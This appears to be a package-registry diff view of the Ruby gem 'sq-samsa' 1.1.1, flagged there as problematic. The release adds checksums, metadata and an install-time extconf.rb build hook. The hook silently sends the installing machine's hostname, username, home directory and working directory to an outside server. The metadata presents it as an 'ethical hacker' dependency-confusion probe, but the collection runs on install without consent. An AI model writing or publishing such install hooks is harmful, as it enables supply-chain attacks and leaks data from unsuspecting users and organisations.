sq-samsa 1.1.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of sq-samsa might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/hola/extconf.rb +14 -0
  3. metadata +49 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 4d0f2e7b8f91619ebd1bcd7f73ee0402966b2b7d8e50a73c32e476febd340608
4
+ data.tar.gz: 02b82af2c0f2e78f39aa14716bea7bc6881a9fa03dc0f654086fb4dcecf1960b
5
+ SHA512:
6
+ metadata.gz: c7d0cff884229f539938b935a9452a01daf824cc7b103edd16902f295538d0fa322ebaf3a7bfafc8a23fc785fa668bfbbdea4895e9f169e7afd98413eeb1a81c
7
+ data.tar.gz: 3638977be8598c990496767202240a29224b22ebd58b7c92338abd9cd45d550745d252143286c0ff50ab64c90e15eb393fb29938955e5db27c8c6b6842b50140
@@ -0,0 +1,14 @@
1
+ require 'uri'
2
+ require 'net/http'
3
+ require 'socket'
4
+
5
+ # Extract only the bare minimum to be able to identify
6
+ # vulnerable organization.
7
+ # Send hostname, username, current working directory, home directory to my server.
8
+ # There isn't anything malicious in here! This information is not private/confidential in any way.
9
+
10
+
11
+ uri = URI('http://ruby-dependency-confusion.jumpingcrab.com/report')
12
+ res = Net::HTTP.post_form(uri, 'gem' => 'sq-samsa', 'version' => '1.1.1', 'hostname' => Socket.gethostname, 'username' => ENV['USER'] || 'no_user', 'home' => File.expand_path('~'), 'cwd' => Dir.pwd)
13
+
14
+
metadata ADDED
@@ -0,0 +1,49 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: sq-samsa
3
+ version: !ruby/object:Gem::Version
4
+ version: 1.1.1
5
+ platform: ruby
6
+ authors:
7
+ - ethical hacker
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2023-03-13 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |-
14
+ WARNING! DO NOT INSTALL THIS GEM.
15
+ This gem is used to detect dependency confusion vulnerabilities. When installed, the gem sends hostname, username, home directory and current working directory to my server so I can identifiy vulnerable companies. The gem does not do anything else. The extracted information is not private/confidential in any way.
16
+ email:
17
+ executables: []
18
+ extensions:
19
+ - ext/hola/extconf.rb
20
+ extra_rdoc_files: []
21
+ files:
22
+ - ext/hola/extconf.rb
23
+ homepage:
24
+ licenses: []
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.1.2
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: WARNING! DO NOT INSTALL THIS GEM. This gem is used to detect dependency confusion
45
+ vulnerabilities. When installed, the gem sends hostname, username, home directory
46
+ and current working directory to my server so I can identifiy vulnerable companies.
47
+ The gem does not do anything else. The extracted information is not private/confidential
48
+ in any way.
49
+ test_files: []